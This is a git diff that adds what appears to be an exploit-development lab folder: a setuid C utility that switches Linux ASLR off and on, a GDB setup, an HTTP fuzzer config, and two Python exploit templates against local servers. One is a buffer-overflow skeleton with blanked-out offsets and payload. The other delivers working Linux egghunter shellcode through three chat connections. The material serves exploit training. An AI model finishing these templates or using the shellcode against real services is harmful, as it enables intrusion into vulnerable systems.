diff --git a/exploit_development/aslr_changer b/exploit_development/aslr_changer new file mode 100644 index 0000000..2952ec3 Binary files /dev/null and b/exploit_development/aslr_changer differ diff --git a/exploit_development/aslr_changer.c b/exploit_development/aslr_changer.c new file mode 100644 index 0000000..2bdcc86 --- /dev/null +++ b/exploit_development/aslr_changer.c @@ -0,0 +1,29 @@ +#include +#include +#include + +int main(int argc, char *argv[]) { + FILE *fp; + char buff[100]; + + if(seteuid(0) == -1) { + fprintf(stderr, "Failed to set UID to root - is this binary setuid root?\n"); + return -1; + } + + if(argc != 2 || (strcmp(argv[1], "0") != 0 && strcmp(argv[1], "2") != 0)) { + fprintf(stderr, "Usage: %s [0 or 2]\nSets randomize_va_space to 0 (ASLR off) or 2 (ASLR on)\n", argv[0]); + return -1; + } + + fp = fopen("/proc/sys/kernel/randomize_va_space", "w"); + fprintf(fp, "%s\n", argv[1]); + fclose(fp); + + fp = fopen("/proc/sys/kernel/randomize_va_space", "r"); + fgets(buff, 99, fp); + fclose(fp); + + printf("randomize_va_space is now %s", buff); + return 0; +} diff --git a/exploit_development/chatserver-smallbuffer b/exploit_development/chatserver-smallbuffer new file mode 100644 index 0000000..893c561 Binary files /dev/null and b/exploit_development/chatserver-smallbuffer differ diff --git a/exploit_development/gdbinit.txt b/exploit_development/gdbinit.txt new file mode 100644 index 0000000..fa8381c --- /dev/null +++ b/exploit_development/gdbinit.txt @@ -0,0 +1,4 @@ +source /root/s5/archive/peda-master/peda.py +set disassembly-flavor intel +set follow-fork-mode parent +#source /root/.gdbinit-gef.py diff --git a/exploit_development/httpdpost.fuzzer b/exploit_development/httpdpost.fuzzer new file mode 100644 index 0000000..c58c23c --- /dev/null +++ b/exploit_development/httpdpost.fuzzer @@ -0,0 +1,13 @@ +outbound fuzz 'POST /arbitrarydataarbitrarydataarbitrarydataarbitrarydata\r\n\r\n\n' +# String to match in the response +inbound '404' +# What port the fuzzer tries to connect to +port 8080 +# What protocol to use +proto tcp +# How long to wait on a response +receiveTimeout 1 +# How long to wait between retrying test cases +failureTimeout 5 +# Number of times to retry a test case +failureThreshold 3 \ No newline at end of file diff --git a/exploit_development/libhttpd b/exploit_development/libhttpd new file mode 100644 index 0000000..a3abc37 Binary files /dev/null and b/exploit_development/libhttpd differ diff --git a/exploit_development/sockets_example.py b/exploit_development/sockets_example.py new file mode 100644 index 0000000..bba1a29 --- /dev/null +++ b/exploit_development/sockets_example.py @@ -0,0 +1,26 @@ +import socket +import sys +import threading +import struct + +IP = "127.0.0.1" +PORT=8080 + +jmpesp = ???? +offset = ???? + +buf = ???? + +payload = ???? +payload = "POST %s\r\n\r\n" % payload + +sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) +sock.settimeout(2) +sock.connect((IP,PORT)) +sock.send(payload) +print "Buffer sent! (len %d)" % len(payload) +try: + print sock.recv(4096) + print "No crash...." +except: + print "Server died, Yayyyy!!" \ No newline at end of file diff --git a/exploit_development/triple_socket_template.py b/exploit_development/triple_socket_template.py new file mode 100644 index 0000000..2d574bc --- /dev/null +++ b/exploit_development/triple_socket_template.py @@ -0,0 +1,43 @@ +#!/usr/bin/python +import os +import socket +import sys +import threading +import struct +import time + +HOST="127.0.0.1" +PORT=2501 + +# Matt Miller Access() egghunter, triggers on "W00TW00T" +egghunter = "\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\x31\xc9\xcd\x80\x3c\xf2\x74\xec\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7" +egghunterPayload = ? +msgPayload = ? + +# Connect one user +sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock1.connect((HOST, PORT)) +sock1.send("usr1\r\n") +sock1.recv(1024) +print "Connected first user" + +# Connect a second user and message the first with the egg +sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock2.connect((HOST, PORT)) +sock2.send("usr2\r\n") +sock2.recv(1024) +time.sleep(1) +print "Connected second user" +sock2.send(msgPayload) +print "Sent msg payload" + +# Connect a final user to trigger egghunter in username +sock3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock3.connect((HOST, PORT)) +sock3.send(egghunterPayload) +print "Sent egghunter payload" + +# Close down +sock3.close() +sock2.close() +sock1.close() \ No newline at end of file